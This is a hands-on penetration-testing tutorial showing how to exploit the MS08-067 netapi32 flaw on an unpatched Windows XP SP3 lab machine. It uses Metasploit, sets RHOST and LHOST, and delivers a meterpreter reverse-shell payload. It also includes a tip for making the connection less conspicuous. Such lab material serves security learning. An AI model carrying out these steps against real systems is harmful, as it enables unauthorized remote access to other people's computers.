In this article we’ll walk you through the act of exploiting a live install of Windows XP Service Pack 3. We’ll make use of the well known vulnerability in the netapi32.dll in the Windows Operating System.
The vulnerability is in fact very dangerous because the attacker is not required to authenticate to the target machine prior to running the attack.
This article is inspired by the book Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, a great resource for learning about hacking and penetration testing.
The exploit module we’ll make use of through the Metasploit framework is called exploit/windows/smb/ms08_067_netapi.
But why Windows XP SP3? Does anybody still even use it?
Before continuing with this tutorial, you’ll need to:
- Have a virtual machine running Kali Linux.
- Have a virtual machine running an unpatched version of Windows XP Service Pack 3.
- Possess basic knowledge of the Linux command line.
Please note that it is illegal to perform this attack without the victim’s permission!
Using Metasploit to exploit Windows XP
Start off by firing up both virtual machines.
Log into Kali Linux, and fire up a terminal window.
The first thing we’ll need to do is to start the Metasploit Framework.
Enter these commands into the terminal window:
- service postgresql start
The first command, service postgresql start, launches a PostgreSQL database, which Metasploit use to track your commands.
The next command, msfconsole, launches the Metasploit text-based console. This is where we’ll perform our attack!
The details for all everything you can do with Metasploit (hacking Window 7 etc.) is out of scope for this tutorial, but Georgia Weidman covers this in great detail in her book.
After msfconsole has finished loading (which can take a while), you should see something like this:
As previously mentioned, we’ll use the module exploit/windows/smb/ms08_067_netapi. We tell metasploit which module to use by entering the following command:
- use windows/smb/ms08_067_netapi
Now that we’ve told Metasploit which exploit module we’d like to use, we need to set some options. Enter this into the command line to show all available options:
- show options
As you see, there are not many options that needs to be set.
- RHOST: This is the target machine’s IP-address. We’ll set this in the next step.
- RPORT: This is the port we’ll perform our attack through. Default of 445 is fine.
- SMBPIPE: Browser is the correct SMBPIPE for this attack.
- Exploit Target: This is the target operating system. Automatic targeting is fine for this attack.
Said in other words, the only option we’ll need to set is the target IP-address. You can find the target IP-address by running ipconfig in cmd on your Windows VM. In my case, the IP-address is 10.0.0.17.
- set RHOST 10.0.0.17
The exploit module is now configured and ready to go. But, we’ll also have to tell metasploit which payload it should install on the target machine. In this attack we’ll use the payload windows/meterpreter/reverse_tcp.
- set payload windows/meterpreter/reverse_tcp
The payload windows/meterpreter/reverse_tcp will create a reverse shell.
A reverse shell will push push a connection from the target machine (windows) back to the attacker (Kali).
In practice, this means that our Kali machine will open a local port and listen for a connection from the target machine, on port 4444 (LPORT).
Note that this isn’t stealthy at all. You should at least change the LPORT to a regular port number like 80 (HTTP) to have any change of succeeding.
You may have noticed that the LHOST field doesn’t contain anything. We’ll need to set LHOST to our Kali IP-address, which is 10.0.0.107 in my case.
The payload needs this information so that the victim machine can connect back to the attacking machine!
- set LHOST 10.0.0.107
Everything’s now setup in metasploit. Before proceeding, make sure that the Windows firewall is deactivated on your Windows VM.
You should also create a txt-file on your desktop in the Windows VM. The content can be anything you like, we’ll just use it to illustrate the power of this attack!
Now that you’re all set and ready to go, let’s exploit the target machine! Type this command to proceed:
By god, we are in!
What has actually happened here?
When exploiting our target machine (Windows XP), we delivered a payload which initiated a reverse shell connection.
The reverse shell made our target machine connect back to the attacking machine (Kali Linux), providing a shell connection directly to the Windows Operating System!
Let’s navigate to the file we created earlier in the Desktop folder (on the Administrator user in my case):
Allright, now we only need to navigate to the Desktop folder, and view the content of the file using the cat command.
Congratulations! You have now gained access to a remote Windows XP operating system, using the exploit/windows/smb/ms08_067_netapi exploit!
If you like this kind of content, I highly recommend you to check out Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, a great resource for learning about hacking and penetration testing.
Time to update your Windows XP installation, eh?